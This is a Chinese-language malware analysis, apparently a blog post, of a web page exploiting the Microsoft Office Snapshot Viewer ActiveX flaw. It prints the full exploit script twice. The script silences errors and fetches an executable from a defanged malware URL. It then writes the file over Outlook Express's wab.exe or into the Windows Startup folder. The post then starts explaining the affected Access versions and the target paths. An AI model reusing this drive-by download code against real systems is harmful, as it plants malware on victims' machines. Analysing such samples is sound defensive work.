贴出完整的代码如下:
1
<script type="text/javascript">
2function killErrors() {
3return true;
4}
5window.onerror = killErrors;
6
7var x;
8var obj;
9var mycars = new Array();
10mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
11mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
12mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
13mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
14mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
15
16var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
17
18if(objlcx="[object]")
19{
20
21setTimeout('window.location = "ldap://"',3000);
22
23for (x in mycars)
24{
25obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
26
27var buf1 = 'hxxp://jijiks8ahsda.cn/9/ck.exe';
28var buf2=mycars[x];
29
30obj.Zoom = 0;
31obj.ShowNavigationButtons = false;
32obj.AllowContextMenu = false;
33obj.SnapshotPath = buf1;
34
35try
36{
37 obj.CompressedPath = buf2;
38 obj.PrintSnapshot();
39
40}catch(e){}
41
42}
43}
44
45</script>
<script type="text/javascript">2
function killErrors() {3
return true;4
}5
window.onerror = killErrors;6
7
var x;8
var obj;9
var mycars = new Array();10
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";11
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";12
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";13
mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";14
mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";15
16
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");17
18
if(objlcx="[object]")19
{20
21
setTimeout('window.location = "ldap://"',3000);22
23
for (x in mycars)24
{25
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")26
27
var buf1 = 'hxxp://jijiks8ahsda.cn/9/ck.exe';28
var buf2=mycars[x];29
30
obj.Zoom = 0;31
obj.ShowNavigationButtons = false;32
obj.AllowContextMenu = false;33
obj.SnapshotPath = buf1;34
35
try36
{37
obj.CompressedPath = buf2;38
obj.PrintSnapshot();39
40
}catch(e){}41
42
}43
}44
45
</script>其中http换成了hxxp防止误入。
很明显,这个是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码,是Office系列软件中Access的漏洞,受这个漏洞影响的Access版本有2003、2002、2000,如果仅仅安装了Microsoft Snapshot Viewer 10.0.4622程序,也具有该漏洞。也难怪这个漏洞会使打全补丁的系统中招,目前官方没有给出补丁,其实世界上根本没有打全了补丁的系统。
我们看到代码中有这样的代码:
1mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
2mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
3mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
4mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
5mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
6
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";2
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";3
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";4
mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";5
mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";6
